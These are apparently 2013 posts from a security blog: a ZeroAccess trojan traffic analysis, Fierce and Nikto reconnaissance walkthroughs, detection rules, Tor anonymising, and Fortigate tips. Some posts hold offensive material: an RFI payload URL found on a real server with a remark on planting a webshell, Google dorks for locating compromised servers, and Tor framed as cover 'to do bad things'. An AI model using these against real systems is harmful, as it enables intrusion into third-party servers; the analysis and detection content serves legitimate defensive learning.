Friday, June 28, 2013

A few days ago, I talked about How to detect ZeroAccess in your Network   Now, I want to show you how this trojan works.

The goal of this trojan is to earn money through Click Fraud... It is a type of crime that abuses pay-per-click advertising to make money through fraudulent or fake clicks on advertisements. ZeroAccess makes money when it generate clicks on Ads. In addition, ZeroAccess has is own botnet. It is ideal for generating a large number of clicks.

I got a sample of this trojan. I uploaded the binary to Virustotal and only 3 antivirus programs detected it as a trojan. If you want a copy, contact me at the botton of this page.

Currently, you can see how many antivirus programs detect the file as malware:
https://www.virustotal.com/es/file/0aae3d7df5c153378596ac03f1796b8800337e14e243529106cfc681005b7ab7/analysis/

I created a virtual machine and I executed this program in a fresh environment.

The first thing ZeroAccess does is connect to http://j.maxmind.com/app/geoip.js in order to locate the infected host in the world.



The second thing the trojan does is connect with some visit counters. It seems the botnet wants to know how many hosts it has infected.

http://www.e-zeeinternet.com/count.php?page=953121&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953130&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953131&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953001&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953020&style=LED_g&nbdigits=9




Then, the trojan makes malformated DNS requests... Wireshark detects them as DNS traffic because these packets are sent over port 53 assigned to DNS traffic. Really it isn't DNS traffic, the trojan is establishing connections with the C&C (command and control) servers and the packets are ciphers.


Finally, the trojan begins to generate traffic over port 16464/UDP.



Each time that I restart the virtual machine, ZeroAccess creates a new code to send to other infected hosts over port 16464/UDP.
9e56cb0d28948dabc9c0d199562fcf9e
975dec6d28948dabc9c0d19943b005e1
fcb23c0a28948dabc9c0d19957ffdbcf
a35ecde828948dabc9c0d199d52aaf97
...
...
...

Notice that part of the code is always the same: 28948dabc9c0d19. Maybe it is the the node where my computer is connected.

See the map below, which I've created. In only three hours, the trojan made these connections with other servers or infected hosts over port 16464/UDP
Zeroaccess supernodes part I


ZeroAccess generates some traffic over port 123/UDP. It's the same case than DNS traffic too. It's not a real NTP traffic.



Your can continue reading ZeroAccess Trojan - Network Analysis Part II


Posted on Friday, June 28, 2013 by Javier Nieto

2 comments

Friday, June 21, 2013

Fierce is a great script written in Perl by RSnake . This tool will help you for the first steps of a pentesting: the reconnaissance.

The idea is to gather as much interesting details as possible about your target before starting the attack.

Fierce is used for DNS Enumeration and has been included in Backtrack and Kali Linux distributions.

It is a great tool for discover non-contiguous IP address for a certain company. You can try a DNS transfer zone,  DNS brute force, reverse lookups...




These are the Fierce options.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -h
fierce.pl (C) Copywrite 2006,2007 - By RSnake at http://ha.ckers.org/fierce/

    Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Options:
    -connect    Attempt to make http connections to any non RFC1918
        (public) addresses.  This will output the return headers but
        be warned, this could take a long time against a company with
        many targets, depending on network/machine lag.  I wouldn't
        recommend doing this unless it's a small company or you have a
        lot of free time on your hands (could take hours-days). 
        Inside the file specified the text "Host:\n" will be replaced
        by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

    -delay        The number of seconds to wait between lookups.
    -dns        The domain you would like scanned.
    -dnsfile      Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
    -dnsserver    Use a particular DNS server for reverse lookups
        (probably should be the DNS server of the target).  Fierce
        uses your DNS server for the initial SOA query and then uses
        the target's DNS server for all additional queries by default.
    -file        A file you would like to output to be logged to.
    -fulloutput    When combined with -connect this will output everything
        the webserver sends back, not just the HTTP headers.
    -help        This screen.
    -nopattern    Don't use a search pattern when looking for nearby
        hosts.  Instead dump everything.  This is really noisy but
        is useful for finding other domains that spammers might be
        using.  It will also give you lots of false positives,
        especially on large domains.
    -range        Scan an internal IP range (must be combined with
        -dnsserver).  Note, that this does not support a pattern
        and will simply output anything it finds.  Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

    -search        Search list.  When fierce attempts to traverse up and
        down ipspace it may encounter other servers within other
        domains that may belong to the same company.  If you supply a
        comma delimited list to fierce it will report anything found.
        This is especially useful if the corporate servers are named
        different from the public facing website.  Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

        Note that using search could also greatly expand the number of
        hosts found, as it will continue to traverse once it locates
        servers that you specified in your search list.  The more the
        better.
    -suppress    Suppress all TTY output (when combined with -file).
    -tcptimeout    Specify a different timeout (default 10 seconds).  You
        may want to increase this if the DNS server you are querying
        is slow or has a lot of network lag.
    -threads  Specify how many threads to use while scanning (default
      is single threaded).
    -traverse    Specify a number of IPs above and below whatever IP you
        have found to look for nearby IPs.  Default is 5 above and
        below.  Traverse will not move into other C blocks.
    -version    Output the version number.
    -wide        Scan the entire class C after finding any matching
        hostnames in that class C.  This generates a lot more traffic
        but can uncover a lot more information.
    -wordlist    Use a seperate wordlist (one word per line).  Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt 


We can make a reverse lookup for a entire class C network like 65.55.58.0/24
root@bt:/pentest/enumeration/
dns/fierce# ./fierce.pl -range 65.55.58.0-255
65.55.58.2    ten1-2-194.co1-6nf-1a.ntwk.msn.net
65.55.58.3    ten1-2-194.co1-6nf-1b.ntwk.msn.net
65.55.58.38    discussions.connect.microsoft.com
65.55.58.183    submit.microsoft.com
65.55.58.186    cvp.membership.microsoft.com
65.55.58.192    microsoftevents.org
65.55.58.197    eugrantsadvisor.com
65.55.58.201    00001001.ch
65.55.58.202    bizspark.microsoft.com
65.55.58.204    cvp.services.microsoft.com
65.55.58.205    piinternalfe2.microsoft.com
65.55.58.206    cvp.services.ppe.microsoft.com
65.55.58.210    livests.test.itasignon.com
65.55.58.211    sts.test.itasignon.com
65.55.58.212    beta.itasignon.microsoft.com
65.55.58.213    itasignon.microsoft.com
65.55.58.214    websitespark.microsoft.com
65.55.58.241    co1vlsc04.microsoft.com
65.55.58.242    co1vlsc05.microsoft.com
65.55.58.243    co1vlsc06.microsoft.com
65.55.58.247    lva.beta.msllab.microsoft.com
65.55.58.248    pi.beta.msllab.microsoft.com


We can try to make a DNS transfer zone and a DNS brute force against google.es. You can choose the DNS that you desire to make the DNS requests. If it isn't specified, Fierce will request to the DNS servers of the target company. In this case, we make the requests against OpenDNS servers 208.67.222.222.
root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -dns google.es -dnsserver 208.67.222.222
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
...
...
...


You can edit the brute force list as you want.
root@bt:/pentest/enumeration/dns/fierce# more hosts.txt
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
...
...
...



Posted on Friday, June 21, 2013 by Javier Nieto

No comments

Wednesday, June 19, 2013

Nikto is one of the most popular web security application when you are beginning a web pentesting project.

You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.

Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:

  • Over 6500 dangerous files/CGIs.
  • More than 1250 outdated version for several web servers.
  • Specific problems on over 270 servers.
  • Presence of index files.
  • HTTP server options like TRACE.
  • Installed software and web servers.


Nikto creates a lot of requests quickly, is not designed as an overly stealthy tool. If you run Nikto against a remote Web Server, the administrator could read a lot of lines on web server log which show the attack. Some SIEMs have defaults rules for correlating these logs and it could create an alarm warning to the administrators about the attack.

These are the Nikto options.
jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have find out the Server and PHP versions and a lot of interesting folders.

We have discover a RFI (Remote File Include) on this server...
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:
<?php phpinfo(); ?>

This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.




Next line is interesting too. Nikto has located some URLs where you  could upload files with your own source code.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.



Nikto is one of the first applications that I run when a client request me a web audit.


Posted on Wednesday, June 19, 2013 by Javier Nieto

2 comments

Friday, June 07, 2013

ZeroAcces is a Trojan horse who use an advanced rootkit to hide itself and create a back door on the compromised host.

The computers are infected  by "drive-by download" attacks:
  1. People who download and execute suspicious programs (ActiveX, Java applet...) without understanding the consequences.
  2. Downloads that happening without user authorization (malware, browser exploits...).
You can learn how the modern malware works downloading "Modern Malware for Dummies".

ZeroAccess want to make money through pay per click advertising using click fraud which is a very lucrative business.

We don't want to analyze this Trojan. I want to show you how you can detect it with Fortigate Firewalls and Snort over Ossim without Antivirus.

This Trojan used port 16464/udp, but I have also seen traffic on the ports 16465/udp, 16470/udp and 16471/udp. You need to deny and log this traffic to detect it.

First it's necessary to create a Custom service.



Then you need to create a policy rule at the top of your policies.


Finally It's necessary to watch your logs and locate the ID of this policy rule. In the log you will see the infected source IP.


If you are working with Ossim & Snort, you should add the next rules into your policies.

First, go to "Policy & Actions" and click on "Trojan".


Type ZeroAccess and add all of the Snort results.


Finally go to Analysis --> Security Events and search the Signature ZeroAccess.





Posted on Friday, June 07, 2013 by Javier Nieto

3 comments

Wednesday, June 05, 2013

Are you using some anomyzer?

Anonymizing your connection is one the main requirements you need to do when you want to do bad things... For this purpose we are going to use TOR.

 "Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis"



First we install Tor:
sudo apt-get install tor
 
Then , we are going to install Proxychains in order to run applications through Tor.
sudo apt-get install proxychains

Then, we need to configure our Proxychains.  We need to know the port that Tor is listening.


Finally edit /etc/proxychains.conf and add the next line
socks4 127.0.0.1 9050

 Now, we can run for example nmap anonymously.



Also, you can configure your browser for surfing on the Internet through Tor without Proxychains

First edit your Connection Settings and add a Manual Proxy.



Then your are hiding your connections. You could check it on http://whatismyipaddress.com/ for example.

Notes my Services are "Tor Exit Node" and that's not my real IP.



Finally you will work without worries...







Posted on Wednesday, June 05, 2013 by Javier Nieto

2 comments

Tuesday, June 04, 2013

In this post we are going to search with Google, servers that have been compromised and they are hosting a webshell.

The most common method to upload a webshell to a server is RFI (Remote File Inclusion). RFI is a vulnerability that allows an attacker to upload a remote file like a script or webshell.

With a webshell, you can manage the server, read/create/remove files/upload files, execute commands on the remote server...

The common webshells are c99.php, c100.php, r57.php...

You can find servers hosting this webshells with the next google dorks

 * Note that some links don't contain webshells because administrators have removed the shell from their servers or the webmaster are using black SEO.

inurl:"c99.php/" "uname -a"



inurl:"b374k.php/" 



inurl:"c100.php" "uname -a"



inurl:r57.php



Posted on Tuesday, June 04, 2013 by Javier Nieto

No comments

If you recently have upgraded your Fortigate Firewall to FortiOS 4.0 MR3 perhaps you have noticed an increase in the traffic log.

FortiOS 4.0 MR3 has the value of extended-traffic-log enabled by default instead of previous versions where this value was disabled by default.

If you want to disabled this new default option, here you have the commands:

  • config log [memory|disk|fortianalyzer|...] 
  • filter set extended-traffic-log [enable|disable]

What does the log filter setting "other-traffic" display?

Posted on Tuesday, June 04, 2013 by Javier Nieto

No comments

Monday, June 03, 2013

When you build a Firewall in High Availability you need to be sure if the cluster's members are totally synchronized.

I am going to give you some commands in order to change the CLI session between the members for checking your HA.

First of all you need to watch how many members there are. If you have an active-pasive cluster, you need to know who is the master member. For this, you need to execute: # get system ha status


Then you need to know the vdoms and all configuration hashes. For this, you can execute: # get system checksum status
 

You need to compare the hashes between the members. It's a requirement to be the same. You change to another members executing:   
# execute ha manage 1


Finnaly you compare the hashes: # get system checksum status


If the hashes are the same, your cluster is ok, if not, you need to solve the problem because one or more the cluster's members are misconfigured.




Posted on Monday, June 03, 2013 by Javier Nieto

No comments

Some times, firewall security administrators have told me... "I have a lot of policy rules on my firewall, how can I discover unused policy rules?" or "I just created a new policy rule, how can I know if this rule has been matching?

With Fortinet Firewalls is really easy to do.

First of all you need to add  a new column in Policy -> Policy section.


It's necessary to add Count option to the right field.

 

Finally, you will see if the rule was matched or not and how many packets and Megabytes cross through the policy rule.


The counters of all policy rules are set to "0 packets/0 B" when the firewall is rebooted. If the last time that you have rebooted your firewall was one year ago and you have policy rules with "0 packets/0 B", maybe this rules are unnecessary.

Also you can set to 0 the counter of a policy rule manually if you you right-click on the policy and select "Clear Counters".



Posted on Monday, June 03, 2013 by Javier Nieto

1 comment